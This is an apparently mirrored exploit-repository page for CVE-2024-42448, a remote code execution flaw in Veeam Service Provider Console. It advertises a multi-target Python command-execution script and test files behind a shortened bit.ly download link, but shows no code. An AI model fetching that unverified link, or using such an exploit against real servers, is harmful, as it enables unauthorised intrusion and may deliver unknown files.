CVE-2024-42448 PoC — Veeam Service Provider Console 安全漏洞

Source

https://github.com/h3lye/CVE-2024-42448-RCE

Associated Vulnerability

Title:Veeam Service Provider Console 安全漏洞 (CVE-2024-42448)
Description:Veeam Service Provider Console是美国Veeam公司的一个支持云的平台。 Veeam Service Provider Console 8.1版本存在安全漏洞，该漏洞源于管理代理机在获得服务器授权的情况下，可以对VSPC服务器机执行远程代码执行。

Description

Veeam Service Provider Console (VSPC) remote code execution.

Readme

# CVE-2024-42448-RCE
Veeam Service Provider Console (`VSPC`) remote code execution.

[Download link here](https://bit.ly/4gknFFV)

# Details:
is a critical vulnerability identified in the Veeam Service Provider Console (`VSPC`) with a CVSS score of `9.9.`<br>
This vulnerability allows for remote code execution (`RCE`).<br>

# About:
(`files.zip`) here you'll find the files and including but not limit to tcp packets captured during testing<br>
some progress with `IDA` (which was unnecessary), but will be effective if you try to understand the root cause<br>
and produce a working exploit.<br>
every step is explained clearly with screenshots inside the process.pdf.<br>
for educational purpose only.
</p>

A python script (`CVE-2024-42448.py`) which trigger the vulnerability and execute user supplied command<br>
can also execute command on single and multiple targets(IP list) with multi-threading capability.<br>


# Download: [here](https://bit.ly/4gknFFV)

File Snapshot


 [4.0K]  /data/pocs/7068322f7cd9e0c0de9d184310aa9f79108d3496
└── [ 966]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!